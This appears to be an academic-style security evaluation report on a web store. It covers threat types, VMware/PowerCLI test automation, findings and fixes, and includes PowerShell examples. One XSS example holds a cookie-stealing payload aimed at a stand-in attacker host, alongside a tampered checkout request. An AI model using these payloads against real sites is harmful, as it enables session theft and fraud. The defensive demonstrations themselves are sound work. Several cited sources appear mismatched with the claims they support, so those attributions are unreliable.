Widgets Inc requested a security evaluation of its web-store, to be carried out by Benny Vandergast Inc. The evaluation is meant to reveal flaws in the security measures implemented in the web-store; the main objective of security testing is to establish how vulnerable a system is and how well its resources and data are protected. In particular, the evaluation tests whether unauthenticated users can access the web-store, steal data from the system or interfere with its processes. A company that runs a web-store conducts most of its transactions online, so those transactions must be accurate and the data they carry must be kept secure. The attributes examined in security testing are availability, authorization, confidentiality, integrity, resilience, authentication and non-repudiation.
Security testing of a web-store application is therefore important. It is done to avoid consequences such as loss of customer trust, the cost of dealing with attacks on the application later, web-store downtime, and the time and expense of recovering from that downtime.
There are several classes of threat to a web-store: privilege escalation, SQL injection, URL manipulation, unauthorized data access, denial of service, identity spoofing and cross-site scripting (Getting, 2018). In privilege escalation, an attacker who already holds an account on the system raises his or her privileges to those of a superuser; the attacker can then run code on the system and may compromise the entire web-store application. SQL injection is an attack technique in which the attacker inserts malicious SQL into an input field that is passed to the database, which can cause the system to disclose critical information from the database; the attacker can then use that information to vandalize the whole system. The attack exploits existing weaknesses in the way the application builds its queries. Unauthorized data access is another major class of attack (Kauffman and Tallon, 2014). It takes several forms, including unauthorized access to data through data-fetching operations or through other systems, and unauthorized access to the network, including the servers. URL manipulation involves tampering with the query strings in the website's URLs.
Denial of service involves preventing legitimate users of the system from reaching its resources; the attack can render the entire system unusable. Data manipulation involves an attacker altering a website's data for his or her own advantage, for example by defacing HTML pages with offensive content. Identity spoofing involves an attacker acquiring the credentials of a legitimate user and then using them to attack network hosts or steal data. Finally, cross-site scripting is a common threat to web-store sites: the attacker injects client-side script into the application, and users who click crafted links execute it in their browsers. Such links can let the attacker steal information from the system or perform actions while posing as the legitimate user.
Benny Vandergast Inc. provided a VMware virtual machine that was used in the testing process. Virtualization technology has advanced from hardware virtualization alone to data, network, storage and memory virtualization, each with its own specification. Testing in a virtualized environment is useful and advantageous for software such as the WidgetsInc web-store.
A number of methods were used in investigating the security of the system. They include cross-site scripting tests, ethical hacking, password cracking, penetration testing, risk assessment, security auditing, security scanning, SQL injection tests, URL manipulation, posture assessment and buffer overflow testing (Singh, 2016).
The testing process followed four practices: tracking down issues that could not be recreated, resolving resource collisions during testing, keeping control when the test matrix became hard to manage, and using smart VMware monitoring (Diez et al., 2016). First, some issues had to be tracked that could not be recreated: bugs that crashed the system but could not be reproduced, leaving the testers without information about what led to the crash. Optimizing testing for such issues requires tools that record and replay execution. In this scenario VMware snapshots were used (eCommerce, 2013). Snapshots allowed the testers to go back to the state that led to a crash and to inspect the threads and processes involved in order to see what caused the crashes experienced with the system. The recorded activity was saved to a file for easy retrieval when needed.
The second practice was resolving resource collisions during testing. Some tests could not be run concurrently because of the difficulty of acquiring the resources they needed. Testing such environments was made possible by cloning and network fencing, which allowed testing in many environments at the same time. For example, user authentication, regression and integration tests could run simultaneously.
The third practice was keeping control of the situation when the test matrix became hard to manage. There were situations in which the testing crew faced difficult trade-offs between the test matrix and the quality of the software to be released. To address this, the crew created templates that established levels of testing. For example, Level One covered website testing, Level Two the operating system, Level Four database testing and Level Five the network, with various tests at each level.
Finally, the group deployed a smart VMware monitoring system. After new software is deployed, the environment needs to be watched. Opvizor is a suitable tool for monitoring a VMware environment (opvizor, 2018): it does not require anyone to keep watching the results and sends a notification once it detects a problem. Snapwatcher was also used to keep track of the snapshots in the VMware environment and is useful for monitoring the behaviour of the system.
Virtualized testing needed to be efficient and automated. Virtualization provides better utilization of hardware. The testing crew can revert a system to a previous state, so cleanup is easy and problems can be debugged from the snapshots. Virtualized testing also limits the loss caused by server crashes: VMs are essentially files, which can be backed up and restored if anything is lost. VMs draw on a shared pool of resources, so images need not be reconfigured when a new physical server is added. The team created such a pool, which minimizes the cost of testing. VM-based testing is easy to maintain and its processes can be automated, so minimal effort was required from the group assigned to test the e-commerce system. The VMs could also be replicated through virtualization using the automation scripts already available.
Benny Vandergast Inc needed virtualization infrastructure on which to install the VMware ESXi hypervisor, which provides the tools to run and manage virtual machines. The group then created a virtualized testing environment, starting from an empty VM in which it installed the guest operating system and the applications required to test the web-store system. This VM was cloned many times during the testing process. Windows Server 2008 and JBoss Application Server 6 were installed on the virtual machine (Mastering VMware vSphere 4, 2011). That was the manually configured server; the rest of the process needed to be automated, and the tool used for this was VMware vSphere PowerCLI, which is developed alongside the vSphere infrastructure. PowerCLI has many useful features, but only a few were needed to create the testing environment (Dekens, 2016).
PowerCLI is built on Microsoft PowerShell. PowerShell is powerful yet user-friendly, as it provides console commands (cmdlets) that are also used to administer Windows products such as IIS, SQL Server, MS Office and many more. PowerCLI was connected to the VMware ESXi server. VMware Tools was installed in the VM, as it improves VM performance and simplifies otherwise difficult operations such as running commands inside the guest. The network interface cards of the operating system were added to the virtual machine configuration, a dedicated IP address was set for the test infrastructure and the VM's IP was updated. A snapshot was created after the network was configured, so that the VM could be reverted to this known state if necessary and reused in future tests.
Next, an environment was created for the configuration files, since some data about the environment is needed by the tests. NIC objects were used to create the configuration files for future tests. The $nic variable holds the IP address, DNS server and subnet mask, and the hash table $env holds the values used when executing the tests. The tests and test frameworks then had to be set up.
The web-store software, the system under test, had to be installed. The test sources and frameworks were synced into the VM (Ixiacom.com, 2018), and report templates were prepared. The Microsoft products were managed through the PowerShell API. A number of executable files and compressed archives containing the scripts were copied to the virtual machine, and the tests were then synced from the source control repository (Softwaretestinghelp.com, 2018).
When the scripts were executed inside the virtual machine they returned their results to the screen, so the progress of a long test could be monitored. Invoke-VMScript was used to run the scripts in the guest. Another snapshot was taken at this point for use in case a revert became necessary (Halal, 2008).
After execution completes a report is created. It holds the test reference, the test status, the log files and the number of executions that took place for a specific task, and it can be configured to be sent to various people. Before another test run the environment is cleaned up by reverting to the snapshot taken at the beginning. In this way multiple test cycles can be run as errors are found until all the errors are fixed.
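The clone, configure, snapshot, run and revert cycle described in the preceding paragraphs, written out as one PowerCLI script. This is an added example and not the testing crew's own script; the ESXi hostname, VM names, IP addresses, the guest interface name "Local Area Connection", the C:\Tests paths and the run-security-tests.ps1 test runner are all placeholders assumed for illustration.

```powershell
# Added example (not from the original report): one PowerCLI cycle for a
# disposable web-store test VM. Hostnames, credentials, VM names and paths are
# placeholders; replace them for your own ESXi host.
Import-Module VMware.PowerCLI

$esxHost   = 'esxi-test.example.local'   # assumption: lab ESXi host
$template  = 'webstore-base'              # assumption: the hand-built Win2008 + JBoss VM
$testVm    = 'webstore-test-01'
$guestCred = Get-Credential -Message 'Guest OS administrator account'

# Environment data kept in hash tables, as the report describes for $nic and $env.
$nic = @{ IP = '10.10.20.15'; Mask = '255.255.255.0'; Gateway = '10.10.20.1'; DNS = '10.10.20.2' }
$env = @{ Name = $testVm; Nic = $nic; ScriptDir = 'C:\Tests'; Report = 'C:\Tests\report.xml' }

Connect-VIServer -Server $esxHost | Out-Null

# 1. Clone the manually configured VM so every run starts from identical bits.
$vmHost = Get-VMHost | Select-Object -First 1
$base   = Get-VM -Name $template
if (-not (Get-VM -Name $testVm -ErrorAction SilentlyContinue)) {
    New-VM -Name $testVm -VM $base -VMHost $vmHost | Out-Null
}
$vm = Get-VM -Name $testVm
if ($vm.PowerState -ne 'PoweredOn') { Start-VM -VM $vm | Out-Null }
# Invoke-VMScript and Copy-VMGuestFile need VMware Tools running in the guest.
Wait-Tools -VM $vm -TimeoutSeconds 600 | Out-Null

# 2. Give the guest its dedicated test IP (interface name is an assumption for
#    Windows Server 2008), then snapshot the configured state.
$netCmd = @"
netsh interface ip set address name="Local Area Connection" static $($nic.IP) $($nic.Mask) $($nic.Gateway) 1
netsh interface ip set dns name="Local Area Connection" static $($nic.DNS)
"@
Invoke-VMScript -VM $vm -ScriptText $netCmd -GuestCredential $guestCred -ScriptType Bat | Out-Null
New-Snapshot -VM $vm -Name 'configured' -Description 'Network set, no tests run' | Out-Null

# 3. Copy the test scripts into the guest, run them, and pull the report back.
Copy-VMGuestFile -Source '.\tests\*' -Destination $env.ScriptDir -VM $vm -LocalToGuest -GuestCredential $guestCred -Force
$run = Invoke-VMScript -VM $vm -ScriptType PowerShell -GuestCredential $guestCred -ScriptText @"
Set-Location '$($env.ScriptDir)'
.\run-security-tests.ps1 -Target 'http://localhost:8080/' -Report '$($env.Report)'
"@
$run.ScriptOutput   # progress and result text produced inside the VM
Copy-VMGuestFile -Source $env.Report -Destination '.\results\' -VM $vm -GuestToLocal -GuestCredential $guestCred -Force

# 4. Clean up: revert to the configured snapshot so the next run is unaffected.
Set-VM -VM $vm -Snapshot (Get-Snapshot -VM $vm -Name 'configured') -Confirm:$false | Out-Null
Disconnect-VIServer -Server $esxHost -Confirm:$false
```

Because the network change is pushed through VMware Tools rather than over the network, the script keeps working while the guest's IP address changes. Reverting to the 'configured' snapshot at the end discards whatever the tests did to the guest, which is what makes repeated runs comparable.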
The web-store was found to have several faults. The first was the acceptance of unwanted or untrusted scripts. Cross-site scripting tests were performed against the web store by attempting to add scripts through the application's inputs (Offutt, 2008). If a system accepts any such script it is prone to attack, and the web-store application did accept the script. This shows that the system is not secure and is open to attack and manipulation. Attackers use such scripts to run malicious processes in the victim's browser (Smartbear.com, 2018), typically to expose the credentials of users of the system.
PowerShell's execution policy can restrict which scripts are allowed to run on the Windows server itself, although it does not stop scripts injected into web pages. Secondly, some users' passwords were easy to guess. An account with a weak password can be used by an attacker to gain access to the system and make changes to the database and the system processes. The affected users were advised to change their passwords and choose strong ones, and the system administrator was urged to accept only users with strong passwords, for instance by issuing them from a password generator. The system also does not prohibit multiple concurrent logins. The other fault in authentication is that session IDs do not expire after a period of inactivity. A session ID that lives indefinitely can be stolen or predicted by an attacker, who can then take over a genuine user's online identity and misuse it (Nahari and Krutz, 2013).
The server hosting the site lacks backup plugins. Backing up every piece of data is essential, and the company should provide backup facilities so that data can be restored after a system failure; if the servers are vandalized and there is no backup, there is a high chance of losing a great deal of data. The web store was also found to be prone to price manipulation (Pandey and Rastogi, 2010). Attackers reach this through the payment flow: in most cases they use an intercepting proxy such as Achilles to change the amount payable before the request reaches the store, as the figure shows. An intruder can lower the price and get away with the goods unnoticed. Finally, the server on which the web-store is installed has no antivirus. The system is therefore prone to malicious software that attackers could insert into the web pages once they gain access to the site, and malware could also be present on the office workstations. Malware gets onto a site in several ways, including cross-site contamination and widespread malware infection. A malware infection can lead to the system being enrolled in a botnet and used for DDoS attacks, to the theft of clients' credit card information, and to the site being used to send spam.
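To make the price-manipulation finding concrete, the following added example (not part of the original report) models a checkout request whose unit price and total have been rewritten with an intercepting proxy, a handler that trusts those figures, and a hardened handler that recomputes the amount from the server-side catalog and rejects the request when the figures disagree. The catalog, SKUs, quantity limit and request body are constructed for illustration.

```powershell
# Added example (not from the original report): trusting the client's price
# versus recomputing it on the server. All data below is constructed.
$catalog = @{ 'WID-100' = 49.99; 'WID-200' = 129.00 }   # assumption: server-side price list

# What an intercepting proxy lets the attacker submit: quantity left alone,
# unit price and total rewritten before the request reaches the store.
$tampered = @'
{ "order": 1001,
  "items": [ { "sku": "WID-200", "qty": 2, "unit_price": 1.00 } ],
  "total": 2.00,
  "currency": "USD" }
'@ | ConvertFrom-Json

function Approve-ChargeUnsafe($Request) {
    # Vulnerable: charge whatever the client says it owes.
    [pscustomobject]@{ Order = $Request.order; Charged = $Request.total; Accepted = $true }
}

function Approve-ChargeSafe($Request, [hashtable]$Catalog) {
    # Hardened: rebuild the total from the catalog and refuse any request whose
    # client-side figures disagree, rather than silently correcting them, so the
    # tampering attempt is visible in the logs.
    $expected = 0.0
    foreach ($item in $Request.items) {
        if (-not $Catalog.ContainsKey($item.sku)) { throw "Unknown SKU $($item.sku)" }
        if ($item.qty -lt 1 -or $item.qty -gt 100) { throw "Bad quantity for $($item.sku)" }  # assumption: per-line cap
        $expected += $Catalog[$item.sku] * $item.qty
    }
    $expected = [math]::Round($expected, 2)
    $accepted = ([math]::Round([double]$Request.total, 2) -eq $expected)
    [pscustomobject]@{ Order = $Request.order; Charged = $expected; Accepted = $accepted }
}

Approve-ChargeUnsafe $tampered
Approve-ChargeSafe   $tampered $catalog
```

The unsafe handler approves the two-dollar charge; the safe one computes the catalog total and marks the request as not accepted. The same principle applies to any value the browser sends that the server already knows, such as discounts, shipping tiers and currency.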
Apart from the issues listed above, the system is in acceptable condition, and the configuration of the e-commerce site was set as required (Schiff, 2018). There are a number of ways to enhance the security of the web-store, including digital certificates, encryption of data in transit, installing antivirus software and performing regular security audits on the system, among other measures (TechGenYZ, 2018).
First, the untrusted scripts in the site should be identified and removed, and whitelist input validation should be added, together with encoding of user-supplied data at the point where it is written into a page. The web applications on the workstations and servers should be kept up to date, since outdated applications tend to be more vulnerable to cross-site scripting; maintaining the current version of the web application and its supporting software is essential (Symantec.com, 2018).
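The cross-site scripting finding and the whitelist validation recommended above, as an added example that is not part of the original report. It models the store's behaviour (a parameter copied verbatim into the page), the hardened render that HTML-encodes at the output point, the reflection probe used to tell the two apart, and a whitelist rule for a display-name field. The payloads and the field rule are constructed assumptions.

```powershell
# Added example (not from the original report): reflected XSS probe, vulnerable
# and encoded renders, and a whitelist validator. Payloads are constructed.

function Render-Unsafe([string]$Name) {
    # What the evaluation found: the parameter lands in the HTML unchanged.
    return "<p>Welcome back, $Name</p>"
}

function Render-Safe([string]$Name) {
    # Hardened form: encode at the output point, so '<' becomes '&lt;' and
    # '"' becomes '&quot;'; the browser shows the text instead of running it.
    return "<p>Welcome back, $([System.Net.WebUtility]::HtmlEncode($Name))</p>"
}

function Test-ReflectedXss([scriptblock]$Render, [string]$Payload) {
    # The probe used in testing: submit a payload containing markup and check
    # whether it comes back byte-for-byte. Verbatim reflection of markup means
    # the renderer is vulnerable.
    $html = & $Render $Payload
    [pscustomobject]@{
        Payload   = $Payload
        Reflected = $html.Contains($Payload)
        Html      = $html
    }
}

function Test-WhitelistInput([string]$Value) {
    # Whitelist rule for a display-name field (assumption: letters, digits,
    # space, dot, underscore, hyphen; 1 to 64 characters). Reject everything else.
    return $Value -match '^[A-Za-z0-9 ._-]{1,64}$'
}

$payloads = @(
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    '"><img src=x onerror=alert(1)>'
)
foreach ($p in $payloads) {
    $unsafe = Test-ReflectedXss -Render ${function:Render-Unsafe} -Payload $p
    $safe   = Test-ReflectedXss -Render ${function:Render-Safe}   -Payload $p
    "payload: $p"
    "  unsafe render reflects markup:  $($unsafe.Reflected)"
    "  encoded render reflects markup: $($safe.Reflected)"
    "  passes whitelist:               $(Test-WhitelistInput $p)"
}
"benign value 'Alice Smith' passes whitelist: $(Test-WhitelistInput 'Alice Smith')"
```

Both payloads are reflected by Render-Unsafe and neither by Render-Safe, and both fail the whitelist while a normal name passes. Note that HtmlEncode is the right encoder for text placed between tags; a value written into a JavaScript block or a URL needs the encoder for that context, and validation alone is not a substitute for encoding at the output point.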
Secondly, weak authentication could cause much havoc in the system (business.com, 2018), as credentials can be stolen or compromised. The best remedy is two-factor authentication, which adds an extra layer of security to the e-commerce site by requiring two means of identification (Uky.edu, 2018). First the user enters the login credentials; second, the user enters a code generated in real time and sent to his or her phone or email. An attacker may succeed at the first step but not at the second (Vranken and Poll, 2015).
Thirdly, the company needs to educate users on the importance of strong passwords. Employees should be trained not to share their login credentials and not to send sensitive data by email or text message, since if those channels or the system are compromised the attackers may end up with sensitive company data or customers' personal information.
The company should install antivirus software on the workstations and the server to help stop malware from entering the network. Finally, the company should have a monitoring system that keeps track of all activity on the site and notifies the administrator when an intrusion is detected. Tools such as Woopra and Clicky make it easy to monitor visitors navigating the website in real time. Once these steps are implemented the e-commerce site will be far better protected against the threats described.
Conclusion
Testing a system through virtualization is easy and efficient. It is scalable and agile, since more virtual machines can be created to run the tests, and there is minimal chance of losing data because snapshots can be reverted to recover a previous state. VMs can also be reverted to a clean state without losing their configuration. With VM testing there is little fear of hardware failure: a VM behaves like physical hardware except that it shares resources with others, and it can be cloned into multiple VMs. The automated nature of VMware-based testing makes use of highly rated testing tools to produce accurate reports.
The security evaluation of the system was performed successfully (Performance Testing: A Comparative Study and Analysis of Web Service Testing Tools, 2018). The security gaps that were found should be examined and the necessary measures taken to reduce the risk to the business. Once the business has implemented the proposed ways of enhancing system security, it can expect greater trust from its customers (Chen et al., 2008); more customers will buy goods and services from WidgetsInc and the profit margin will increase. A secure system holds accurate and reliable data, which can be used in the company's decision making.
References
Schiff, J. (2018). 15 Ways to Protect Your Ecommerce Site From Hacking and Fraud. [online] CIO. Available at: https://www.cio.com/article/2384809/e-commerce/15-ways-to-protect-your-ecommerce-site-from-hacking-and-fraud.html [Accessed 22 May 2018].
business.com. (2018). E-commerce Security: Protect Your Store – business.com. [online] Available at: https://www.business.com/articles/e-commerce-website-security-5-best-practices-to-protect-your-online-store/ [Accessed 22 May 2018].
opvizor. (2018). 4 Best Practices for Software Testing With VMware. [online] Available at: https://www.opvizor.com/4-best-practices-for-software-testing-with-vmware/ [Accessed 22 May 2018].
Softwaretestinghelp.com. (2018). How to Install and Use VMWare Virtual Machine in Software Testing — Software Testing Help. [online] Available at: https://www.softwaretestinghelp.com/how-to-install-and-use-vmware-virtual-machine-in-software-testing/ [Accessed 22 May 2018].
Symantec.com. (2018). Common Security Vulnerabilities in e-commerce Systems | Symantec Connect. [online] Available at: https://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems [Accessed 22 May 2018].
TechGenYZ. (2018). What is e-commerce and what are the major threats to e-commerce security?. [online] Available at: https://www.techgenyz.com/2017/04/05/e-commerce-major-threats-e-commerce-security/ [Accessed 22 May 2018].
Getting, B. (2018). Protect Data From Cross-Site Scripting (XSS) Attacks | Practical Ecommerce. [online] Practical Ecommerce. Available at: https://www.practicalecommerce.com/Protect-Data-From-Cross-Site-Scripting-XSS-Attacks [Accessed 22 May 2018].
Pubs.vmware.com. (2018). VMware vSphere 5.1. [online] Available at: https://pubs.vmware.com/vsphere-51/index.jsp?topic=%2Fcom.vmware.powercli.cmdletref.doc%2FGet-ErrorReport.html [Accessed 22 May 2018].
eCommerce. (2013). Controlling, 25(6), pp.311-311.
Offutt, J. (2008). Editorial: Software testing is an elephant. Software Testing, Verification and Reliability, 18(4), pp.191-192.
Dekens, L. (2016). VMware vSphere PowerCLI Reference. Indianapolis: Sybex, a Wiley brand.
Mastering VMware vSphere 4. (2011). Sybex Inc.
Vranken, H. and Poll, E. (2015). Software security. Heerlen: Open Universiteit.
Smartbear.com. (2018). What is Service Virtualization? | SmartBear. [online] Available at: https://smartbear.com/learn/software-testing/what-is-service-virtualization/ [Accessed 22 May 2018].
Ixiacom.com. (2018). The Ixia Difference in Virtualization Testing | Ixia. [online] Available at: https://www.ixiacom.com/resources/ixia-difference-virtualization-testing [Accessed 22 May 2018].
Uky.edu. (2018). E-commerce securities. [online] Available at: https://www.uky.edu/~dsianita/390/390wk4.html [Accessed 22 May 2018].
Kauffman, R. and Tallon, P. (2014). Economics, Information Systems, and Electronic Commerce. Hoboken: Taylor and Francis.
Nahari, H. and Krutz, R. (2013). Web commerce security. Hoboken, N.J.: Wiley.
Halal, W. (2008). Technology’s promise. Houndmills, Basingstoke, Hampshire [England]: Palgrave Macmillan.
Singh, N. (2016). A Survey of Threats to E-Commerce Applications. Research Journal of Science and Technology, 8(3), p.145.
Pandey, D. and Rastogi, A. (2010). A Critical Research on threats and security technology related to Payment System on E-commerce Network. International Journal of Computer Applications, 8(3), pp.11-14.
Chen, J., Schmidt, M., Phan, D. and Arnett, K. (2008). E-commerce security threats: awareness, trust and practice. International Journal of Information Systems and Change Management, 3(1), p.16.
Diez, H., Segura, Á., García-Alonso, A. and Oyarzun, D. (2016). 3D model management for e-commerce. Multimedia Tools and Applications, 76(20), pp.21011-21031.
Performance Testing: A Comparative Study and Analysis of Web Service Testing Tools. (2018). International Journal of Recent Trends in Engineering and Research, 4(3), pp.95-100.